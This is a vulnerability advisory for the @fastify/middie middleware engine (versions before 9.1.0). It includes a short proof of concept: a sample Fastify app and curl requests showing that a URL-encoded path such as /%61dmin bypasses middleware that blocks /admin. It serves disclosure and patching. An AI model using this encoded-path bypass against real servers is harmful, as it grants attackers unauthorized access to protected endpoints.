Improper Handling of URL Encoding (Hex Encoding) Affecting @fastify/middie package, versions <9.1.0

@fastify/middie is a Middleware engine for Fastify

Affected versions of this package are vulnerable to Improper Handling of URL Encoding (Hex Encoding) where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., /%61dmin instead of /admin). An attacker can gain unauthorized access to protected endpoints by sending such requests.

Step 1: Run the following Fastify application (save as app.js):

const fastify = require('fastify')({ logger: true });

async function start() {
  // Register middie for Express-style middleware support
  await fastify.register(require('@fastify/middie'));
  // Middleware to block /admin route
  fastify.use('/admin', (req, res, next) => {
    res.statusCode = 403;
    res.end('Forbidden: Access to /admin is blocked');
  });
  // Sample routes
  fastify.get('/', async (request, reply) => {
    return { message: 'Welcome to the homepage' };
  });
  fastify.get('/admin', async (request, reply) => {
    return { message: 'Admin panel' };
  });
  // Start server
  try {
    await fastify.listen({ port: 3008 });
  } catch (err) {
    fastify.log.error(err);
    process.exit(1);
  }
}
start();

Step 2: Execute the attack.

Normal Request (Blocked):

curl http://localhost:3008/admin
# Output: Forbidden: Access to /admin is blocked

Bypass Request (Successful):

curl http://localhost:3008/%61dmin
# Output: {"message":"Admin panel"}

• GitHub Advisory
• GitHub Commit
• GitHub PR
• GitHub Release